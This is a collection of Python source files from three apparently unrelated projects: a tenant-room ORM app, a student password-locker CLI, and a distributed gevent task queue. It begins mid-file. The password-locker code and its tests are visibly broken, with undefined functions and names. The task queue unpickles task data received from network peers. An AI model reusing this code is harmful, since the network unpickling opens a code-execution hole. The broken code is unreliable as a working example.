if isinstance(response.json, list):
response_as_list_parsed = parse_obj_as(
List[response_model], response.json
)
response_as_list_validated = [
item.dict() for item in response_as_list_parsed
]
return jsonify(response_as_list_validated)
else:
response_validated = response_model(**response.json)
return jsonify(response_validated.dict())
return func(*args, **kwargs)
except ValidationError as e:
return abort(400, description=e)
return parse_with_pydantic_wrapper
return parser
|
neil-vqa/firekeep | tests/test_firekeep.py | from firekeep.models import (
MaximumNumberOfOccupantsReached,
Room,
Tenant,
assign_to_room,
)
import pytest
def test_assign_tenant_to_room():
tenant = Tenant("Neil", "Alino", 20120065)
room = Room("GF-001", 5)
assign_to_room(tenant, room)
assert tenant in room.occupants
def test_raise_max_number_of_occupants_reached_if_cannot_assign():
tenants = [
Tenant("Neil", "Alino", 20120065),
Tenant("Jefford", "Librado", 20120055),
Tenant("Ed", "Decena", 20120045),
Tenant("Wins", "Sabellona", 20120035),
]
room = Room("1F-001", 2)
with pytest.raises(MaximumNumberOfOccupantsReached):
for tenant in tenants:
assign_to_room(tenant, room)
|
neil-vqa/firekeep | firekeep/config.py | import os
from typing import Optional
def get_postgres_uri() -> Optional[str]:
DB_URI = os.environ.get("POSTGRES_DB_URI")
return DB_URI
def get_sqlite_uri() -> str:
return "sqlite:///test.db"
|
neil-vqa/firekeep | firekeep/services.py | from typing import Any
from sqlalchemy.orm import Session
def assign_tenant_to_room(
room_number: str, room_id: int, tenant_id: int, session_object: Session
) -> Any:
with session_object as session:
print(room_number)
return room_number, tenant_id
|
neil-vqa/firekeep | firekeep/repository.py | import abc
from firekeep.models import Room
class AbstractBaseRepository(abc.ABC):
@abc.abstractmethod
def get(self, room_number: str):
raise NotImplementedError
@abc.abstractmethod
def assign(self, room: Room):
raise NotImplementedError
class SQLAlchemyRepository(AbstractBaseRepository):
def __init__(self, session) -> None:
self.session = session
def get(self, room_number: str):
pass
def assign(self, room: Room):
pass
|
neil-vqa/firekeep | firekeep/db_session.py | <filename>firekeep/db_session.py
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from firekeep import config
engine = create_engine(config.get_sqlite_uri())
Session = sessionmaker(engine)
|
neil-vqa/firekeep | firekeep/orm.py | from sqlalchemy import Column, MetaData, Table
from sqlalchemy.orm import registry, relationship
from sqlalchemy.sql.schema import ForeignKey
from sqlalchemy.sql.sqltypes import Integer, String
from firekeep.models import Room, Tenant
mapper_registry = registry()
metadata_obj = MetaData()
room_table = Table(
"room",
metadata_obj,
Column("id", Integer, primary_key=True),
Column("room_number", String(8)),
Column("max_capacity", Integer),
)
tenant_table = Table(
"tenant",
metadata_obj,
Column("id", Integer, primary_key=True),
Column("first_name", String(20)),
Column("last_name", String(20)),
Column("student_id_number", Integer),
Column("room_id", Integer, ForeignKey("room.id")),
)
def run_mappers():
mapper_registry.map_imperatively(
Room, room_table, properties={"occupants": relationship(Tenant, backref="room")}
)
mapper_registry.map_imperatively(Tenant, tenant_table)
|
Shavolski/Password-Locker | run.py | from user import User
from credentials import Credentials
import random
def greetings():
print(" __ __ ")
print(" /\ /\ | | | | ")
print("| | | | ________ | | | | _____ ")
print("| |____| | | ___ | | | | | / \ ")
print("| ____ | | |___| | | | | | | ___ | ")
print("| | | | | ______| | |__ | |__ | |___| | ")
print("| | | | | |______ | | | | | | ")
print(" \/ \/ \_______/ \_____/ \____/ \_____/ ")
greetings()
def password (password):
'''
Function to rewrite the Value error to make it easier to understand
'''
print("Create new password ")
try:
number = int(input())
return number
except ValueError:
return "That was not a valid input"
def create_contact(fname, lname, password, email):
'''
Function to create a new contact
'''
new_user = User(fname, lname, password, email)
return new_user
def save_user(user):
'''
Function to save user
'''
user.save_user()
def del_user():
'''
Function to delete a user
'''
contact.delete_user()
def find_user(password):
'''
Function that finds a user by number and returns the user
'''
return User.find_by_password(password)
def check_existing_user(password):
'''
Function that check if a user exists with that password and return a Boolean
'''
return User.user_exist(password)
def display_user():
'''
Function that returns all the saved user
'''
return user.display_user()
def main():
print("...........Whatsup Huuuumaaan?.This is the place where I, the bot, make passwords for you. What is your name?...........")
user_name = input()
print(f"........Waddup {user_name}. my master (Developer) wants me to assist you in making a user account.......")
print('\n')
while True:
print(
"Yo human...Use these short codes to walk through around my master's app : cu - create a new user, dc - display user, fc -find a user, ex -exit the user list")
short_code = input().lower()
if short_code == 'cu':
print("...............New User.............")
print("-"*10)
print("-"*10)
print("...............Pop up your First name...............")
f_name = input()
print("-"*10)
print("...............Pop up your Last name...............")
l_name = input()
print("-"*10)
print("..................Let me do the magic in making your Password................")
random_number = random.randint(1000,9999)
print(random_number)
print("-"*10)
print(".................Email address..................")
e_address = input()
print("-"*10)
print("-"*10)
# create and save new contact.
save_user(create_user(f_name,l_name,password,e_address))
print('\n')
print(f"New User {f_name} {l_name} created")
print('\n')
elif short_code == 'dc':
if display_users():
print("Here is a list of all your user")
print('\n')
for user in display_users():
print(
f"{user.first_name} {user.last_name} .....{user.password}")
print('\n')
else:
print('\n')
print(
"you don't have any")
print('\n')
elif short_code == 'fc':
print("Enter the password you want to search for")
search_password = input()
if check_existing_user(search_password):
search_user = find_user(
search_password)
print(
f"{search_user.first_name} {search_user.last_name}")
print('-' * 20)
print(
f"Password.......{search_user.password}")
print(
f"Email address.......{search_user.email}")
else:
print("Again I don't get it")
elif short_code == "ex":
print("Adios!.......")
break
else:
print(
"I'm a bot I can't. PLEASE use the short codes")
if __name__ == '__main__':
main()
|
Shavolski/Password-Locker | credentials.py | import random
class Credentials:
"""
Class that generates new instances of credentials
"""
credentials_list = []
def __init__(self,password,email):
self.password = password
self.email = email
credentials_list = []
def save_credentials(self):
'''
save_credentials method saves objects into credentials_list
'''
Credentials.credentials_list.append(self)
def delete_credentials(self):
'''
delete_credentials method deletes a saved credentials from the credentials_list
'''
Credentials.credentials_list.remove(self)
@classmethod
def find_by_password(cls, password):
'''
Method that takes in a password and returns a credentials that matches that password.
Args:
password: <PASSWORD> before
Returns:
Credentials of person that matches the password
'''
for credentials in cls.credentials_list:
if credentials.password == password:
return credentials
@classmethod
def credentials_exist(cls, password):
'''
Method that checks if a credentials exists from the credentials_list.
Args:
password: password to search if it exists
Returns :
Boolean: True or false depending if the credentials_exists
'''
for credentials in cls.credentials_list:
if credentials.password == password:
return True
return False
@classmethod
def display_credentials(cls):
'''
method that returns the credentials_list
credentials_found = Credentials.find_by_password(password)
'''
return cls.credentials_list
@classmethod
def copy_email(cls, password):
pyperclip.copy(credentials_found.email)
|
Shavolski/Password-Locker | user.py | import random
class User:
"""
Class that generates new instances of contacts
"""
user_list = []
def __init__(self,first_name,last_name,):
self.first_name = first_name
self.last_name = last_name
contact_list = []
def save_user(self):
'''
save_user method saves user objects into user_list
'''
User.user_list.append(self)
def delete_user(self):
'''
delete_user method deletes a saved user from the user_list
'''
User.user_list.remove(self)
@classmethod
def find_by_name(cls, name):
'''
Method that takes in a name and returns a user that matches that name.
Args:
name: First or Last name to search before
Returns:
User of person that matches the name
'''
for user in cls.user_list:
if user.first_name == first_name:
return user
@classmethod
def user_exist(cls, name):
'''
Method that checks if a user exists from the user list.
Args:
name: Name to search if it exists
Returns :
Boolean: True or false depending if the user exists
'''
for user in cls.user_list:
if user.first_name == first_name:
return True
return False
|
Shavolski/Password-Locker | test.py | <filename>test.py
import unittest
import pyperclip
from user import User
from credentials import Credentials
class TestUser(unittest.TestCase):
'''
Test class that defines test cases for the user class behaviours.
Args:
unittest.TestCase: TestCase class that helps in reating test cases.
'''
def setUp(self):
'''
Set up method to run before each test cases.
'''
self.new_user = User("Steve","Wachira")
def tearDown(self):
'''
tearDown method that does clean up after each test case has run.
'''
User.user_list = []
def test_init(self):
'''
test_init test case to test of the object is initialized properly
'''
self.assertEqual(self.new_user.first_name,"Steve")
self.assertEqual(self.new_user.last_name,"Wachira")
def test_save_user(self):
'''
test_save_user test case to test if the user object is saved into the user_list
'''
self.new_user()
self.assertEqual(len(User.user_list),1)
def test_save_multiple_user(self):
'''
test_save_multiple_user check if we can save multiple user objects to our user_lists
'''
self.new_user.save_user()
test_user = User("Test","user",)
test_user.save_user()
self.assertEqual(len(User.user_list),2)
def test_delete_user(self):
'''
test_delete_user to test if we can remove a user from our user user_list
'''
self.new_user.save_user()
test_user = User("Test","user")
test_user.save_user()
self.new_user.delete_user()
self.assertEqual(len(User.user_list), 1)
def test_find_user_by_name(self):
'''
test to check if we can find a user by name and display information
'''
self.new_user.save_user()
test_user = User("Test","user")
test_user.save_user()
found_user = User.first_name("Steve")
self.assertEqual(found_user.name)
def test_user_exists(self):
'''
test to check if we can return a Boolean if we cannot find the contact.
'''
self.new_user.save_user()
test_user = User("Test", "user")
test_user.save_user()
user_exists = User.user_exist("Steve")
self.assertTrue(user_exists)
def test_display_all_user(self):
'''
method that returns a list of all users saved
'''
self.assertEqual(User.display_users(), User.user_list)
#This is the test for the credentials
class TestCredentials(unittest.TestCase):
'''
Test class that defines test cases for the contact class behaviours.
Args:
unittest.TestCase: TestCase class that helps in reating test cases.
'''
def setUp(self):
'''
Set up method to run before each test cases.
'''
self.new_credentials = Credentials("1244","<EMAIL>")
def tearDown(self):
'''
tearDown method that does clean up after each test case has run.
'''
Credentials.credentials_list = []
def test_init(self):
'''
test_init test case to test of the object is initialized properly
'''
self.assertEqual(self.new_credentials.password,"<PASSWORD>")
self.assertEqual(self.new_credentials.email,"<EMAIL>")
def test_save_credentials(self):
'''
test_save_credentials test case to test if the contact object is saved into the credentials_list
'''
self.new_credentials()
self.assertEqual(len(Credentials.credentials_list),1)
def test_save_multiple_credentials(self):
'''
test_save_multiple_credentials check if we can save multiple credentials objects to our credentials_lists
'''
self.new_credentials.save_credentials()
test_credentials = Credentials("1244","<EMAIL>")
test_credentials.save_credentials()
self.assertEqual(len(Credentials.credentials_list),2)
def test_delete_credentials(self):
'''
test_delete_credentials to test if we can remove a credentials from our credentials credentials_list
'''
self.new_credentials.save_credentials()
test_credentials = Credentials("1244","<EMAIL>")
test_credentials.save_credentials()
self.new_credentials.delete_credentials()
self.assertEqual(len(Credentials.credentials_list), 1)
def test_find_credentials_by_number(self):
'''
test to check if we can find a contact by phone number and display information
'''
self.new_credentials.save_credentials()
test_credentials.save_credentials()
found_credentials = Credentials.find_by_password("<PASSWORD>")
self.assertEqual(found_credentials.email, test_credentials.email)
def test_credentials_exists(self):
'''
test to check if we can return a Boolean if we cannot find the contact.
'''
self.new_credentials.save_credentials()
test_credentials = Credentials("1244","<EMAIL>")
test_credentials.__call__()
credentials_exists = Credentials.credentials_exist("1244")
self.assertTrue(credentials_exists)
def test_display_all_credentials(self):
'''
method that returns a list of all credentials saved
'''
self.assertEqual(Credentials.display_credentials(), credentials.credentials_list)
def test_copy_email(self):
'''
Test to confirm that we are copying the email address from a found credentials
'''
self.new_credentials.save_credentials()
Credentials.copy_email("<EMAIL>")
self.assertEqual(self.new_credentials.email, pyperclip.paste())
if __name__ == '__main__':
unittest.main()
|
progrium/miyamoto | setup.py | <reponame>progrium/miyamoto<gh_stars>1-10
#!/usr/bin/env python
from setuptools import setup
setup(
name='miyamoto',
version='0.1',
author='<NAME>',
author_email='<EMAIL>',
description='task queue',
packages=['miyamoto'],
scripts=[],
install_requires=['gevent', 'httplib2'],
data_files=[
#('/etc/init.d', ['init.d/realtime']),
]
)
|
progrium/miyamoto | miyamoto/task.py | import base64
import cPickle
import json
import time
import urllib
import urllib2
import urlparse
import uuid
import gevent
class Task(object):
def __init__(self, queue_name, content_type, body):
self.queue_name = queue_name
if content_type == 'application/json':
data = json.loads(body)
self.url = data['url']
self.method = data.get('method', 'POST')
countdown = data.get('countdown')
self.eta = data.get('eta')
self.params = data.get('params', {})
elif content_type == 'application/x-www-form-urlencoded':
data = urlparse.parse_qs(body)
self.url = data['task.url'][0]
self.method = data.get('task.method', ['POST'])[0]
countdown = data.get('task.countdown', [None])[0]
self.eta = data.get('task.eta', [None])[0]
self.params = dict([(k,v[0]) for k,v in data.items() if not k.startswith('task.')])
else:
raise NotImplementedError("content type not supported")
if countdown and not self.eta:
self.eta = int(time.time()+int(countdown))
self.id = str(uuid.uuid4()) # vs time.time() is about 100 req/sec slower
self.replica_hosts = []
self.replica_offset = 0
self._greenlet = None
self._serialize_cache = None
def time_until(self):
if self.eta:
countdown = int(int(self.eta) - time.time())
if countdown < 0:
return self.replica_offset
else:
return countdown + self.replica_offset
else:
return self.replica_offset
def schedule(self, dispatcher):
self._greenlet = gevent.spawn_later(self.time_until(), dispatcher.dispatch, self)
def reschedule(self, dispatcher, eta):
self.cancel()
self.eta = eta
self.schedule(dispatcher)
def cancel(self):
self._greenlet.kill()
def serialize(self):
if self._serialize_cache:
return self._serialize_cache
else:
return base64.b64encode(cPickle.dumps(self, cPickle.HIGHEST_PROTOCOL))
@classmethod
def unserialize(cls, data):
task = cPickle.loads(base64.b64decode(data))
task._serialize_cache = data
return task |
progrium/miyamoto | miyamoto/scheduler.py | <filename>miyamoto/scheduler.py
import gevent.monkey; gevent.monkey.patch_all()
import socket
import time
import gevent
import gevent.server
import gevent.socket
import gevent.queue
from cluster import ClusterManager
from dispatcher import DispatchClient
from task import Task
import util
import constants
class ScheduleError(Exception): pass
class DistributedScheduler(object):
def __init__(self, queue, leader, replica_factor=2, replica_offset=5, interface=None,
port=6001, cluster_port=6000):
if interface is None:
interface = socket.gethostbyname(socket.gethostname())
self.interface = interface
self.port = port
self.dispatcher = DispatchClient(interface, self._dispatcher_event)
self.cluster = ClusterManager(leader, callback=self._cluster_update,
interface=interface, port=cluster_port)
self.backend = gevent.server.StreamServer((interface, port), self._backend_server)
self.peers = set()
self.connections = {}
self.queue = queue
self.scheduled = {}
self.scheduled_acks = {}
self.schedules = 0
self.replica_factor = replica_factor
self.replica_offset = replica_offset
def start(self):
self.dispatcher.start()
self.backend.start()
self.cluster.start()
def schedule(self, task):
host_list = list(self.peers)
# This implements the round-robin N replication method for picking
# which hosts to send the task. In short, every schedule moves along the
# cluster ring by one, then picks N hosts, where N is level of replication
replication_factor = min(self.replica_factor, len(host_list))
host_ids = [(self.schedules + n) % len(host_list) for n in xrange(replication_factor)]
hosts = [host_list[id] for id in host_ids]
task.replica_hosts = hosts
self.scheduled_acks[task.id] = gevent.queue.Queue()
for host in hosts:
self.connections[host].send('schedule:%s\n' % task.serialize())
task.replica_offset += self.replica_offset
try:
# TODO: document, wrap this whole operation in timeout
return all([self.scheduled_acks[task.id].get(timeout=2) for h in hosts])
except gevent.queue.Empty:
raise ScheduleError("not all hosts acked")
finally:
self.schedules += 1
self.scheduled_acks.pop(task.id)
def _cluster_update(self, hosts):
add_hosts = hosts - self.peers
remove_hosts = self.peers - hosts
for host in remove_hosts:
print "disconnecting from peer %s" % host
gevent.spawn(self._remove_peer, host)
for host in add_hosts:
print "connecting to peer %s" % (host)
gevent.spawn(self._add_peer, host)
self.peers = hosts
def _add_peer(self, host):
client = gevent.socket.create_connection((host, self.port), source_address=(self.interface, 0))
self.connections[host] = client
for line in util.line_protocol(client):
ack, task_id = line.split(':', 1)
if ack == 'scheduled' and task_id in self.scheduled_acks:
self.scheduled_acks[task_id].put(True)
print "disconnected from peer %s" % host
self._remove_peer(host)
def _remove_peer(self, host):
if host in self.connections:
peer = self.connections.pop(host)
try:
peer.shutdown(0)
except:
pass
def _dispatcher_event(self, event, payload):
if event == 'start':
task = self.scheduled[payload]
eta = int(time.time() + constants.WORKER_TIMEOUT)
self._sendto_replicas(task, 'reschedule:%s:%s\n' % (task.id, eta))
elif event == 'success':
task = self.scheduled[payload]
self._sendto_replicas(task, 'cancel:%s\n' % task.id)
self.scheduled.pop(task.id)
elif event == 'failure':
task_id, reason = payload.split(':', 1)
self.scheduled.pop(task.id)
print "FAILURE %s: %s" % (task_id, reason)
def _sendto_replicas(self, task, message):
other_replica_hosts = set(task.replica_hosts) - set([self.interface])
for host in other_replica_hosts:
if host in self.connections:
self.connections[host].send(message)
def _backend_server(self, socket, address):
for line in util.line_protocol(socket):
action, payload = line.split(':', 1)
if action == 'schedule':
task = Task.unserialize(payload)
task.schedule(self.dispatcher)
self.scheduled[task.id] = task
socket.send('scheduled:%s\n' % task.id)
print "scheduled: %s" % task.id
elif action == 'cancel':
task_id = payload
print "canceled: %s" % task_id
self.scheduled.pop(task_id).cancel()
elif action == 'reschedule':
task_id, eta = payload.split(':', 1)
eta = int(eta)
print "rescheduled: %s for %s" % (task_id, eta)
self.scheduled[task_id].reschedule(self.dispatcher, eta)
|
progrium/miyamoto | miyamoto/constants.py | <filename>miyamoto/constants.py
DEFAULT_CLUSTER_PORT = 6000
DEFAULT_FRONTEND_PORT = 8088
DEFAULT_BACKEND_PORT = 6001
DEFAULT_REPLICA_FACTOR = 2
DEFAULT_REPLICA_SECS_OFFSET = 5
WORKER_TIMEOUT = 5 |
progrium/miyamoto | attic/zmq_prototype/fabfile.py | import os
import os.path
import sys
import time
import boto
from fabric.api import *
ami = 'ami-9c9f6ef5'
key_name = 'progrium'
conn = boto.connect_ec2()
#if os.path.exists('hosts'):
# f = open('hosts', 'r')
# env.roledefs = f.read()
def start():
reservation = conn.get_image(ami).run(key_name=key_name)
instance = reservation.instances[0]
while instance.update() == 'pending':
sys.stdout.write('.')
sys.stdout.flush()
time.sleep(1)
env.hosts = ['root@%s' % instance.public_dns_name]
time.sleep(60)
def touch():
run("touch testfile")
|
progrium/miyamoto | attic/zmq_prototype/utils.py | <gh_stars>1-10
from zmq import devices
import collections
import time
import operator
import memcache
def cluster(spec):
address, key = spec.split('/')
return memcache.Client([address]).get(key).split(',')
def elect(client, name, candidate, ttl=60):
""" Simple leader election-esque distributed selection method """
if not client.append(name, ',%' % cadidate, time=ttl):
if client.add(name, candidate, time=ttl):
return True
else:
return False
else:
return False
class SampledRate(object):
"""Tool for pushing rate over time data"""
def __init__(self, frequency=1, resolution=1, parent=None, callback=None, name=None):
""" frequency: Rate update frequency in seconds
resolution: Interval to average data over in seconds
parent: Another SampledRate that ticks will propagate to
callback: Optional callback when frequency is updated"""
self.frequency = frequency
self.resolution = resolution
self.parent = parent
self.callback = callback
self.samples = collections.defaultdict(int)
self.ticks = 0
self.last_start = None
self.last_value = 0
if not name and parent:
self.name = parent.name
else:
self.name = name
def _update(self):
if self.last_start and int(time.time() - self.last_start) > self.frequency:
# Add empty samples
for x in range(self.frequency-len(self.samples)):
self.samples[x] = 0
self.last_value = reduce(operator.add, self.samples.values()) / self.resolution / self.frequency
self.last_start = int(time.time())
if self.callback:
# reactor.callLater(0, self.callback, self.last_value, self.ticks)
self.callback(self.last_value, self.ticks)
self.ticks = 0
self.samples = collections.defaultdict(int)
def tick(self, ticks=1):
if not self.last_start:
self.last_start = int(time.time())
self._update()
if self.parent:
self.parent.tick(ticks)
self.samples[int(time.time() / self.resolution)] += ticks
self.ticks += ticks
return self
def getvalue(self):
self._update()
return self.last_value
def __int__(self):
return self.getvalue()
def __str__(self):
# Okay, hardcoding 1 sec resolutions for now
return "%i %s/sec" % (self.getvalue(), self.name or 'ticks')
def __repr__(self):
return "<SampledRate: %i avg/%is updated/%is>" % (self.getvalue(), self.frequency, self.resolution)
class Device(devices.ThreadDevice):
def __init__(self, type, in_type, out_type, ctx):
self._context = ctx
devices.ThreadDevice.__init__(self, type, in_type, out_type)
def _setup_sockets(self):
# create the sockets
ins = self._context.socket(self.in_type)
if self.out_type < 0:
outs = ins
else:
outs = self._context.socket(self.out_type)
# set sockopts (must be done first, in case of zmq.IDENTITY)
for opt,value in self._in_sockopts:
ins.setsockopt(opt, value)
for opt,value in self._out_sockopts:
outs.setsockopt(opt, value)
for iface in self._in_binds:
ins.bind(iface)
for iface in self._out_binds:
outs.bind(iface)
for iface in self._in_connects:
ins.connect(iface)
for iface in self._out_connects:
outs.connect(iface)
return ins,outs |
progrium/miyamoto | attic/zmq_prototype/perf.py | <filename>attic/zmq_prototype/perf.py
import sys
import os
import eventlet
import uuid
import time
import random
from eventlet.green import socket
from eventlet.green import zmq
from eventlet.hubs import use_hub
from zmq import devices
import memcache
import utils
use_hub('zeromq')
task = sys.argv[1]
nodes = utils.cluster(sys.argv[2])
ctx = zmq.Context()
messages = []
def stopped(count, td):
print count
print td
print 1/(td/count)
sys.exit(0)
def enqueuer(n):
frontend = ctx.socket(zmq.REQ)
for node in nodes:
frontend.connect('tcp://%s:7000' % node)
for m in range(n):
job = '%s::{"job":%s}' % (random.random(), time.time())
frontend.send(job)
resp = frontend.recv()
messages.append(job)
#print resp
def dequeuer():
dispatcher = ctx.socket(zmq.PULL)
finisher = ctx.socket(zmq.PUB)
for node in nodes:
dispatcher.connect('tcp://%s:8000' % node)
finisher.connect('tcp://%s:9000' % node)
timeout = None
t1 = None
while True:
id, job = dispatcher.recv().split(':', 1)
if not timeout is None:
timeout.cancel()
if not t1:
t1 = time.time()
messages.append(job)
finisher.send(id)
td = time.time() - t1
timeout = eventlet.spawn_after(5, stopped, len(messages), td)
try:
if task == 'enqueue':
size = int(os.environ.get('MESSAGES', 10000))
t1 = time.time()
eventlet.spawn_n(enqueuer, size)
while len(messages) < size:
eventlet.sleep(0.1)
td = time.time() - t1
stopped(len(messages), td)
elif task == 'dequeue':
eventlet.spawn_n(dequeuer)
while True:
eventlet.sleep(0.1)
except (KeyboardInterrupt, SystemExit):
sys.exit(0) |
progrium/miyamoto | miyamoto/tests/__init__.py | import socket
import gevent
import gevent.event
import gevent.pywsgi
from miyamoto import start
def _unused_port():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('localhost', 0))
addr, port = s.getsockname()
s.close()
return port
class Cluster(object):
def __init__(self, size=2, replica_factor=2):
self.size = size
self.replica_factor = replica_factor
self.nodes = []
self.leader = '127.0.0.1'
def start(self, wait=True):
for n in xrange(self.size):
self.add(False)
if wait:
for node in self.nodes:
node.ready.wait()
def stop(self):
for node in self.nodes:
node.terminate()
self.nodes = []
def add(self, wait=True):
interface = '127.0.0.%s' % (len(self.nodes)+1)
node = start(self.leader, self.replica_factor, interface)
self.nodes.append(node)
if wait:
node.ready.wait()
return node
def __len__(self):
return len(self.nodes)
class TaskCountdown(object):
def __init__(self, count=1):
self.count = count
self.server = gevent.pywsgi.WSGIServer(('', _unused_port()), self._app, log=None)
self.done = gevent.event.Event()
def start(self, count=None):
if count:
self.count = count
self.server.start()
self.url = 'http://%s:%s' % (self.server.server_host, self.server.server_port)
return self.url
def wait(self, timeout=None):
self.done.wait(timeout)
def finished(self):
return self.done.isSet()
def _app(self, env, start_response):
self.count -= 1
if self.count <= 0:
self.done.set()
self.server.kill()
start_response("200 OK", {})
return ['ok']
|
progrium/miyamoto | attic/zmq_prototype/http.py | import cgi
import sys
import eventlet
from eventlet.green import socket
from eventlet.green import zmq
from eventlet.hubs import use_hub
from eventlet import wsgi
import utils
use_hub('zeromq')
port = int(sys.argv[1])
nodes = utils.cluster(sys.argv[2])
ctx = zmq.Context()
pool = []
for n in range(2):
enqueuer = ctx.socket(zmq.REQ)
for node in nodes:
print "Connecting to %s..." % node
enqueuer.connect('tcp://%s:7000' % node)
pool.append(enqueuer)
def enqueue(env, start_response):
for n in range(len(pool)):
try:
pool[n].send(env['wsgi.input'].read())
resp = pool[n].recv()
if 'stored' in resp:
start_response('200 OK', [('Content-Type', 'text/plain')])
else:
start_response('503 Error', [('Content-Type', 'text/plain')])
return ['%s\r\n' % resp]
except:
pass
start_response('503 Error', [('Content-Type', 'text/plain')])
return ['%s\r\n' % resp]
wsgi.server(eventlet.listen(('', port)), enqueue) |
progrium/miyamoto | miyamoto/__init__.py | <reponame>progrium/miyamoto
import os
import logging
import multiprocessing
import threading
import json
import sys
from gevent_zeromq import zmq
import gevent
import httplib2
from miyamoto.queue import QueueServer
from miyamoto.dispatcher import Dispatcher
from miyamoto import constants
logger = logging.getLogger()
logger.addHandler(logging.StreamHandler(sys.stdout))
class _MiyamotoNode(object):
def __init__(self, leader, replicas, interface, mode=multiprocessing):
self.leader = leader
self.replicas = replicas
self.interface = interface
self.ready = multiprocessing.Event()
self.pool = []
self.running = False
def start(self):
if not self.running:
self._start_dequeuer()
self._start_enqueuer()
self.running = True
def join(self):
for process in self.pool:
process.join()
def terminate(self, block=True):
for process in self.pool:
process.terminate()
while block and process.is_alive():
gevent.sleep()
def enqueue(self, queue_name, task):
url = 'http://%s:%s/%s' % (self.interface, constants.DEFAULT_FRONTEND_PORT, queue_name)
headers = {'Content-Type': 'application/json'}
http = httplib2.Http()
resp, content = http.request(url, method='POST', headers=headers, body=json.dumps(task))
print ">", resp, content
if resp['status'] == '200':
return True
else:
return False
def _start_enqueuer(self):
def enqueuer():
gevent.sleep(1)
server = QueueServer(self.leader, replica_factor=self.replicas, interface=self.interface)
if self.ready:
server._ready_event = self.ready
server.start()
process = multiprocessing.Process(target=enqueuer, name='enqueuer')
process.start()
self.pool.append(process)
def _start_dequeuer(self):
def dequeuer():
context = zmq.Context()
dispatcher = Dispatcher(self.interface, context)
dispatcher.start()
process = multiprocessing.Process(target=dequeuer, name='dequeuer')
process.start()
self.pool.append(process)
def start(leader, replicas, interface=None):
logger.info("Starting Miyamoto...")
m = _MiyamotoNode(leader, replicas, interface)
m.start()
return m |
progrium/miyamoto | scripts/start.py | <reponame>progrium/miyamoto
import sys
import os
from miyamoto import start
interface = os.environ.get('INTERFACE')
leader = os.environ.get('LEADER', interface)
replicas = int(os.environ.get('REPLICAS', 2))
print "%s: Using leader %s..." % (interface, leader)
start(leader, replicas, interface)
|
progrium/miyamoto | attic/zmq_prototype/sampler.py | <filename>attic/zmq_prototype/sampler.py
import sys
import os
import eventlet
import time
from eventlet.green import socket
from eventlet.green import zmq
from eventlet.hubs import use_hub
import utils
use_hub('zeromq')
ctx = zmq.Context()
nodes = utils.cluster(sys.argv[1])
def sampler(rate):
dispatcher = ctx.socket(zmq.PULL)
finisher = ctx.socket(zmq.PUB)
for node in nodes:
dispatcher.connect("tcp://%s:8000" % node)
finisher.connect("tcp://%s:9000" % node)
while True:
id, job = dispatcher.recv().split(':', 1)
rate.tick()
finisher.send(id)
def redraw(v, t):
os.system("clear")
print "Last sample: %s messages/sec" % v
try:
rate = utils.SampledRate(0.5, 3, callback=redraw, name='messages')
eventlet.spawn_n(sampler, rate)
while True:
eventlet.sleep(1)
except (KeyboardInterrupt, SystemExit):
print "Exiting." |
progrium/miyamoto | attic/zmq_prototype/debug.py | import sys
import eventlet
from eventlet.green import socket
from eventlet.green import zmq
from eventlet.hubs import use_hub
import utils
use_hub('zeromq')
ctx = zmq.Context()
nodes = utils.cluster(sys.argv[1])
def worker():
dispatcher = ctx.socket(zmq.PULL)
finisher = ctx.socket(zmq.PUB)
for node in nodes:
dispatcher.connect('tcp://%s:8000' % node)
finisher.connect('tcp://%s:9000' % node)
while True:
id, job = dispatcher.recv().split(':', 1)
print job
finisher.send(id)
try:
eventlet.spawn_n(worker)
while True: eventlet.sleep(1)
except (KeyboardInterrupt, SystemExit):
print "Exiting." |
progrium/miyamoto | scripts/worker.py | from gevent import wsgi
import gevent
def outputter(env, start):
print env
#gevent.sleep(4)
start('200 OK', {})
return ["ok"]
print 'Serving on 8080...'
wsgi.WSGIServer(('', 8080), outputter).serve_forever() |
progrium/miyamoto | attic/zmq_prototype/bigtest.py |
# spawn workers
# initiate restiator (pointed to http.py)
# show enqueue rate, sent count
# wait for results from workers
# show dequeue rate, received count
# show aggregated throughput rate (noting concurrency) |
progrium/miyamoto | miyamoto/service.py | <filename>miyamoto/service.py<gh_stars>1-10
import gevent
import gevent.baseserver
import gevent.event
import gevent.pool
READY = True
class Service(object):
"""Service interface for creating standalone or composable services
This is similar to a subset of the gevent baseserver interface (intentional)
so that you can treat them as children services.
"""
stop_timeout = 1
ready_timeout = 2
def __init__(self):
self._stopped_event = gevent.event.Event()
self._ready_event = gevent.event.Event()
self._children = []
self._greenlets = gevent.pool.Group()
self.started = False
@property
def ready(self):
return self._ready_event.isSet()
def spawn(self, *args, **kwargs):
self._greenlets.spawn(*args, **kwargs)
def start(self, block_until_ready=True):
assert not self.started, '%s already started' % self.__class__.__name__
self._stopped_event.clear()
self._ready_event.clear()
try:
for child in self._children:
if isinstance(child, Service):
child.start(block_until_ready)
elif isinstance(child, gevent.baseserver.BaseServer):
child.start()
ready = self._start()
if ready is True:
self._ready_event.set()
elif not ready and block_until_ready is True:
self._ready_event.wait(self.ready_timeout)
self.started = True
except:
self.stop()
raise
def _start(self):
raise NotImplementedError()
def stop(self, timeout=None):
"""Stop accepting the connections and close the listening socket.
If the server uses a pool to spawn the requests, then :meth:`stop` also waits
for all the handlers to exit. If there are still handlers executing after *timeout*
has expired (default 1 second), then the currently running handlers in the pool are killed."""
self.started = False
try:
for child in self._children:
child.stop()
self._stop()
finally:
if timeout is None:
timeout = self.stop_timeout
if self._greenlets:
self._greenlets.join(timeout=timeout)
self._greenlets.kill(block=True, timeout=1)
self._ready_event.clear()
self._stopped_event.set()
def _stop(self):
raise NotImplementedError()
def serve_forever(self, stop_timeout=None):
"""Start the service if it hasn't been already started and wait until it's stopped."""
if not self.started:
self.start()
try:
self._stopped_event.wait()
except:
self.stop(timeout=stop_timeout)
raise |
progrium/miyamoto | attic/zmq_prototype/core.py | import sys
import os
import eventlet
import uuid
import time
import json
from eventlet.green import socket
from eventlet.green import zmq
from eventlet.hubs import use_hub
from eventlet import wsgi
from zmq import devices
import memcache
import webob
from utils import Device
from cluster import ClusterNode
from agenda import Agenda
use_hub('zeromq')
interface = sys.argv[1]
cluster_address, cluster_key = sys.argv[2].split('/')
datastore = memcache.Client([cluster_address], debug=0)
ctx = zmq.Context()
cluster = ClusterNode(ctx, datastore, cluster_key, interface, ttl=10)
cluster.join()
agenda = Agenda(datastore, 'miyamoto-data')
dispatch_timeout = 60
# These need to have a max size
enqueued = set()
